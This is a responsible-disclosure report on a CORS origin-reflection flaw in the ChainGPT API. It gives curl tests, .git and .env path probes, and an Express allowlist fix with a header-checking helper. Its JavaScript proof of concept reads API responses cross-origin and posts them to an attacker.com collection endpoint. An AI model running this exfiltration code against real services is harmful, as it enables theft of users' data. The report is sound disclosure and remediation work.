Responsible Security Disclosure
Severity: Medium (CVSS 5.3)
Affected Component: api.chaingpt.org - All API endpoints
Summary
The ChainGPT API (api.chaingpt.org) reflects any origin in the Access-Control-Allow-Origin header without validation. This allows any website to make cross-origin requests and read API responses, breaking the browser's same-origin policy.
Affected Endpoints
https://api.chaingpt.org/ (root)
https://api.chaingpt.org/news
https://api.chaingpt.org/chat/chatHistory
https://api.chaingpt.org/nft/abi
https://api.chaingpt.org/nft/get-chains
Proof of Concept
# Test CORS reflection
curl -sI https://api.chaingpt.org/ -H "Origin: https://evil.com" | grep access-control-allow-origin
# Result:
# access-control-allow-origin: https://evil.com
# Test multiple origins - ALL are reflected:
# https://evil.com     -> reflected (confirmed)
# https://attacker.com -> reflected (confirmed)
# http://localhost     -> reflected (confirmed)
# https://google.com   -> reflected (confirmed)
JavaScript PoC (save as exploit.html on any domain):
<script>
  fetch('https://api.chaingpt.org/news')
    .then(r => r.json())
    .then(data => {
      // Data is readable cross-origin!
      console.log(data);
      // Exfiltrate to attacker server
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: JSON.stringify(data)
      });
    });
</script>
Impact
| Impact | Description |
| --- | --- |
| Data Theft | Read API responses from any origin |
| Session Abuse | Potential cookie theft if credentials enabled |
| API Abuse | Bypass rate limits via distributed origins |
Additional Findings
1. CORS Wildcard on app.chaingpt.org (Low)
curl -sI https://app.chaingpt.org/staking -H "Origin: https://evil.com" | grep access-control
# access-control-allow-origin: *
2. Protected Sensitive Paths (Info)
curl -sI https://www.chaingpt.org/.git | head -1
# HTTP/2 403
curl -sI https://www.chaingpt.org/.env | head -1
# HTTP/2 403
Recommended Fix
Implement an origin whitelist:
const express = require('express');
const cors = require('cors');
const app = express();

// Exact-match allowlist: compare full origins, never a suffix or a regex,
// so attacker-controlled hosts such as chaingpt.org.evil.com are not accepted.
const allowedOrigins = [
  'https://www.chaingpt.org',
  'https://app.chaingpt.org',
  'https://staking.chaingpt.org'
];

app.use(cors({
  origin: function(origin, callback) {
    // Requests without an Origin header (curl, server-to-server) are not
    // browser cross-origin requests and are allowed through unchanged.
    if (!origin || allowedOrigins.includes(origin)) {
      callback(null, true);
    } else {
      callback(new Error('Not allowed by CORS'));
    }
  },
  // Keep credentials disabled unless a specific endpoint needs cookies,
  // so a future allowlist mistake cannot expose authenticated responses.
  credentials: false
}));
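The allowlist decision above, together with a small check that classifies the Access-Control-Allow-Origin header an endpoint returns for a given request Origin, as an added example that is not part of the original report or of ChainGPT's code; the three allowed origins are taken from the recommended fix and the response headers below are constructed for illustration.

```javascript
// Exact-match origin allowlist (same origins as in the recommended fix).
const allowedOrigins = new Set([
  'https://www.chaingpt.org',
  'https://app.chaingpt.org',
  'https://staking.chaingpt.org',
]);

// Full-string comparison: a suffix test such as origin.endsWith('chaingpt.org')
// would also accept hosts like https://chaingpt.org.example.
function isAllowedOrigin(origin) {
  return typeof origin === 'string' && allowedOrigins.has(origin);
}

// The same decision in the shape of the `cors` package's origin callback.
// A missing Origin header (curl, server-to-server) is passed through.
function corsOrigin(origin, callback) {
  if (!origin || isAllowedOrigin(origin)) {
    callback(null, true);
  } else {
    callback(new Error('Not allowed by CORS'));
  }
}

// Classify the CORS policy visible in a response, given the Origin that was
// sent. Header names are lower-cased as Node's http module reports them.
// Handy for re-testing the listed endpoints once a fix is deployed.
function classifyCors(requestOrigin, responseHeaders) {
  const acao = responseHeaders['access-control-allow-origin'];
  const creds = responseHeaders['access-control-allow-credentials'] === 'true';
  if (acao === undefined) return 'none';
  if (acao === '*') return creds ? 'wildcard-with-credentials' : 'wildcard';
  if (acao === requestOrigin && !isAllowedOrigin(requestOrigin)) {
    return creds ? 'reflected-with-credentials' : 'reflected';
  }
  return 'restricted';
}

// Constructed sample: the header seen in the report for api.chaingpt.org,
// and the header seen for app.chaingpt.org/staking.
const reflectedSample = { 'access-control-allow-origin': 'https://evil.com' };
const wildcardSample = { 'access-control-allow-origin': '*' };
```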
Disclosure
I am reporting this finding in good faith under responsible disclosure principles. I have not exploited this vulnerability beyond verification, have not accessed any user data, and have not caused any damage to your systems.
Contact:
I kindly request:
- Acknowledgment of receipt within 7 days
- A timeline for remediation
- Bug bounty reward (if applicable)
A detailed HTML report with full technical analysis is available upon request.
Khasbi Maulana